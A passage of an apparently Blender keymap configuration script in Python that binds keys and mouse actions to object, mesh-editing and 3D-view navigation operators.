kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_make_links')
kmi = km.keymap_items.new('object.duplicate_move', 'D', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.duplicate_move_linked', 'D', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.join', 'J', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.convert', 'C', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.proxy_make', 'P', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.make_local', 'L', 'PRESS')
kmi = km.keymap_items.new('anim.keyframe_insert_menu', 'I', 'PRESS')
kmi = km.keymap_items.new('anim.keyframe_delete_v3d', 'I', 'PRESS', alt=True)
kmi = km.keymap_items.new('anim.keying_set_active_set', 'I', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('group.create', 'G', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('group.objects_remove', 'G', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('group.objects_remove_all', 'G', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('group.objects_add_active', 'G', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('group.objects_remove_active', 'G', 'PRESS', shift=True, alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'W', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_object_specials')
kmi.active = False
kmi = km.keymap_items.new('object.data_transfer', 'T', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.subdivision_set', 'ZERO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 0)
kmi = km.keymap_items.new('object.subdivision_set', 'ONE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 1)
kmi = km.keymap_items.new('object.subdivision_set', 'TWO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 2)
kmi = km.keymap_items.new('object.subdivision_set', 'THREE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 3)
kmi = km.keymap_items.new('object.subdivision_set', 'FOUR', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 4)
kmi = km.keymap_items.new('object.subdivision_set', 'FIVE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 5)
kmi = km.keymap_items.new('view3d.manipulator', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'release_confirm', True)
# Map Mesh
km = kc.keymaps.new('Mesh', space_type='EMPTY', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('mesh.loopcut_slide', 'R', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.inset', 'I', 'PRESS')
kmi = km.keymap_items.new('mesh.poke', 'P', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.bevel', 'B', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'vertex_only', False)
kmi = km.keymap_items.new('mesh.bevel', 'B', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'vertex_only', True)
kmi = km.keymap_items.new('mesh.loop_select', 'SELECTMOUSE', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi = km.keymap_items.new('mesh.loop_select', 'SELECTMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi = km.keymap_items.new('mesh.edgering_select', 'SELECTMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi = km.keymap_items.new('mesh.edgering_select', 'SELECTMOUSE', 'PRESS', shift=True, ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi = km.keymap_items.new('mesh.shortest_path_pick', 'SELECTMOUSE', 'PRESS', ctrl=True)
kmi.active = False
kmi = km.keymap_items.new('mesh.select_all', 'A', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'SELECT')
kmi = km.keymap_items.new('mesh.select_all', 'I', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'INVERT')
kmi = km.keymap_items.new('mesh.select_more', 'NUMPAD_PLUS', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_less', 'NUMPAD_MINUS', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_non_manifold', 'M', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('mesh.select_linked', 'L', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'HOLD', ctrl=True)
kmi_props_setattr(kmi.properties, 'deselect', True)
kmi = km.keymap_items.new('mesh.faces_select_linked_flat', 'F', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'G', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_select_similar')
kmi = km.keymap_items.new('wm.call_menu', 'TAB', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_select_mode')
kmi = km.keymap_items.new('mesh.hide', 'H', 'PRESS')
kmi_props_setattr(kmi.properties, 'unselected', False)
kmi = km.keymap_items.new('mesh.hide', 'H', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'unselected', True)
kmi = km.keymap_items.new('mesh.reveal', 'H', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.normals_make_consistent', 'N', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'inside', False)
kmi = km.keymap_items.new('mesh.normals_make_consistent', 'N', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'inside', True)
kmi = km.keymap_items.new('view3d.edit_mesh_extrude_move_normal', 'E', 'CLICK')
kmi = km.keymap_items.new('wm.call_menu', 'E', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_extrude')
kmi = km.keymap_items.new('transform.edge_crease', 'E', 'PRESS', shift=True)
kmi = km.keymap_items.new('mesh.spin', 'R', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.fill', 'F', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.beautify_fill', 'F', 'PRESS', shift=True, alt=True)
kmi = km.keymap_items.new('mesh.quads_convert_to_tris', 'T', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'quad_method', 'BEAUTY')
kmi_props_setattr(kmi.properties, 'ngon_method', 'BEAUTY')
kmi = km.keymap_items.new('mesh.quads_convert_to_tris', 'T', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'quad_method', 'FIXED')
kmi_props_setattr(kmi.properties, 'ngon_method', 'CLIP')
kmi = km.keymap_items.new('mesh.tris_convert_to_quads', 'J', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.rip_move', 'V', 'PRESS')
kmi = km.keymap_items.new('mesh.rip_move_fill', 'V', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.rip_edge_move', 'D', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.merge', 'M', 'PRESS', alt=True)
kmi = km.keymap_items.new('transform.shrink_fatten', 'S', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.edge_face_add', 'F', 'PRESS')
kmi = km.keymap_items.new('mesh.duplicate_move', 'D', 'PRESS', shift=True)
kmi = km.keymap_items.new('wm.call_menu', 'A', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'name', 'INFO_MT_mesh_add')
kmi = km.keymap_items.new('mesh.separate', 'P', 'PRESS')
kmi = km.keymap_items.new('mesh.split', 'Y', 'PRESS')
kmi = km.keymap_items.new('mesh.vert_connect_path', 'J', 'PRESS')
kmi = km.keymap_items.new('transform.vert_slide', 'V', 'PRESS', shift=True)
kmi = km.keymap_items.new('mesh.dupli_extrude_cursor', 'ACTIONMOUSE', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'rotate_source', True)
kmi = km.keymap_items.new('mesh.dupli_extrude_cursor', 'ACTIONMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'rotate_source', False)
kmi = km.keymap_items.new('wm.call_menu', 'X', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_delete')
kmi = km.keymap_items.new('wm.call_menu', 'DEL', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_delete')
kmi = km.keymap_items.new('mesh.dissolve_mode', 'X', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.dissolve_mode', 'DEL', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.knife_tool', 'C', 'CLICK')
kmi_props_setattr(kmi.properties, 'use_occlude_geometry', True)
kmi_props_setattr(kmi.properties, 'only_selected', False)
kmi = km.keymap_items.new('mesh.knife_tool', 'K', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_occlude_geometry', False)
kmi_props_setattr(kmi.properties, 'only_selected', True)
kmi = km.keymap_items.new('object.vertex_parent_set', 'P', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('wm.call_menu', 'W', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_specials')
kmi.active = False
kmi = km.keymap_items.new('wm.call_menu', 'F', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_faces')
kmi = km.keymap_items.new('wm.call_menu', 'E', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_edges')
kmi = km.keymap_items.new('wm.call_menu', 'V', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_vertices')
kmi = km.keymap_items.new('wm.call_menu', 'H', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_hook')
kmi = km.keymap_items.new('wm.call_menu', 'U', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_uv_map')
kmi = km.keymap_items.new('wm.call_menu', 'G', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_vertex_group')
kmi = km.keymap_items.new('object.subdivision_set', 'ZERO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 0)
kmi = km.keymap_items.new('object.subdivision_set', 'ONE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 1)
kmi = km.keymap_items.new('object.subdivision_set', 'TWO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 2)
kmi = km.keymap_items.new('object.subdivision_set', 'THREE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 3)
kmi = km.keymap_items.new('object.subdivision_set', 'FOUR', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 4)
kmi = km.keymap_items.new('object.subdivision_set', 'FIVE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 5)
kmi = km.keymap_items.new('wm.context_cycle_enum', 'O', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit_falloff')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'O', 'PRESS')
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit')
kmi_props_setattr(kmi.properties, 'value_1', 'DISABLED')
kmi_props_setattr(kmi.properties, 'value_2', 'ENABLED')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'O', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit')
kmi_props_setattr(kmi.properties, 'value_1', 'DISABLED')
kmi_props_setattr(kmi.properties, 'value_2', 'CONNECTED')
kmi = km.keymap_items.new('view3d.manipulator', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'release_confirm', True)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'HOLD', shift=True)
kmi = km.keymap_items.new('mesh.select_mode', 'ONE', 'CLICK')
kmi = km.keymap_items.new('mesh.select_mode', 'TWO', 'CLICK')
kmi_props_setattr(kmi.properties, 'type', 'EDGE')
kmi = km.keymap_items.new('mesh.select_mode', 'THREE', 'CLICK')
kmi_props_setattr(kmi.properties, 'type', 'FACE')
kmi = km.keymap_items.new('mesh.select_mode', 'ONE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'use_expand', False)
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('mesh.select_mode', 'TWO', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'type', 'EDGE')
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('mesh.select_mode', 'THREE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'type', 'FACE')
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('wm.call_menu', 'ONE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_vertices')
kmi.active = False
kmi = km.keymap_items.new('wm.call_menu', 'TWO', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_edges')
kmi.active = False
kmi = km.keymap_items.new('wm.call_menu', 'THREE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_faces')
kmi.active = False
# Map 3D View
km = kc.keymaps.new('3D View', space_type='VIEW_3D', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('view3d.cursor3d', 'RIGHTMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'ACTIONMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_rRMB')
kmi = km.keymap_items.new('view3d.cursor3d', 'RIGHTMOUSE', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('view3d.rotate', 'MIDDLEMOUSE', 'PRESS')
kmi = km.keymap_items.new('view3d.move', 'MIDDLEMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.zoom', 'MIDDLEMOUSE', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('view3d.dolly', 'MIDDLEMOUSE', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('view3d.view_selected', 'SPACE', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', True)
kmi = km.keymap_items.new('view3d.view_selected', 'NUMPAD_PERIOD', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', False)
kmi = km.keymap_items.new('view3d.view_lock_to_active', 'NUMPAD_PERIOD', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.view_lock_clear', 'NUMPAD_PERIOD', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.navigate', 'F', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.smoothview', 'TIMER1', 'ANY', any=True)
kmi = km.keymap_items.new('view3d.rotate', 'TRACKPADPAN', 'ANY')
kmi = km.keymap_items.new('view3d.rotate', 'MOUSEROTATE', 'ANY')
kmi = km.keymap_items.new('view3d.move', 'TRACKPADPAN', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.zoom', 'TRACKPADZOOM', 'ANY')
kmi = km.keymap_items.new('view3d.zoom', 'TRACKPADPAN', 'ANY', ctrl=True)
kmi = km.keymap_items.new('view3d.zoom', 'NUMPAD_PLUS', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'NUMPAD_MINUS', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom', 'EQUAL', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'MINUS', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom', 'WHEELINMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'WHEELOUTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.dolly', 'NUMPAD_PLUS', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.dolly', 'NUMPAD_MINUS', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.dolly', 'EQUAL', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.dolly', 'MINUS', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom_camera_1_to_1', 'NUMPAD_ENTER', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.view_center_camera', 'HOME', 'PRESS')
kmi = km.keymap_items.new('view3d.view_center_lock', 'HOME', 'PRESS')
kmi = km.keymap_items.new('view3d.view_center_cursor', 'HOME', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.view_center_pick', 'F', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.view_all', 'HOME', 'PRESS')
kmi_props_setattr(kmi.properties, 'center', False)
kmi = km.keymap_items.new('view3d.view_all', 'HOME', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'use_all_regions', True)
kmi_props_setattr(kmi.properties, 'center', False)
kmi = km.keymap_items.new('view3d.view_all', 'C', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'center', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_0', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'CAMERA')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_2', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITDOWN')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_4', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITLEFT')
kmi = km.keymap_items.new('view3d.view_persportho', 'NUMPAD_5', 'PRESS')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_6', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITRIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_8', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITUP')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_2', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANDOWN')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_4', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANLEFT')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_6', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_8', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANUP')
kmi = km.keymap_items.new('view3d.view_roll', 'NUMPAD_4', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLLEFT')
kmi = km.keymap_items.new('view3d.view_roll', 'NUMPAD_6', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLTRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELUPMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELDOWNMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANLEFT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELUPMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'PANUP')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'PANDOWN')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELUPMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITLEFT')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELDOWNMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITRIGHT')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELUPMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITUP')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELDOWNMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITDOWN')
kmi = km.keymap_items.new('view3d.view_roll', 'WHEELUPMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLLEFT')
kmi = km.keymap_items.new('view3d.view_roll', 'WHEELDOWNMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLTRIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.localview', 'NUMPAD_SLASH', 'PRESS')
kmi = km.keymap_items.new('view3d.ndof_orbit_zoom', 'NDOF_MOTION', 'ANY')
kmi = km.keymap_items.new('view3d.ndof_orbit', 'NDOF_MOTION', 'ANY', ctrl=True)
kmi = km.keymap_items.new('view3d.ndof_pan', 'NDOF_MOTION', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.ndof_all', 'NDOF_MOTION', 'ANY', shift=True, ctrl=True)
kmi = km.keymap_items.new('view3d.view_selected', 'NDOF_BUTTON_FIT', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', False)
kmi = km.keymap_items.new('view3d.view_roll', 'NDOF_BUTTON_ROLL_CCW', 'PRESS')
kmi_props_setattr(kmi.properties, 'angle', -1.5707963705062866)
kmi = km.keymap_items.new('view3d.view_roll', 'NDOF_BUTTON_ROLL_CW', 'PRESS')
kmi_props_setattr(kmi.properties, 'angle', 1.5707963705062866)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_FRONT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_BACK', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_LEFT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_RIGHT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_TOP', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_BOTTOM', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_FRONT', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_RIGHT', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_TOP', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', True)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', True)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY', ctrl=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('view3d.view_center_pick', 'MIDDLEMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new('transform.translate', 'D', 'CLICK')
kmi = km.keymap_items.new('transform.resize', 'S', 'CLICK')
kmi = km.keymap_items.new('transform.rotate', 'A', 'CLICK')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'Z', 'CLICK')
kmi_props_setattr(kmi.properties, 'data_path', 'space_data.viewport_shade')
kmi_props_setattr(kmi.properties, 'value_1', 'SOLID')
kmi_props_setattr(kmi.properties, 'value_2', 'WIREFRAME')
kmi.active = False
kmi = km.keymap_items.new('wm.context_toggle', 'Z', 'CLICK')
kmi_props_setattr(kmi.properties, 'data_path', 'space_data.use_occlude_geometry')
# Map Transform Modal Map
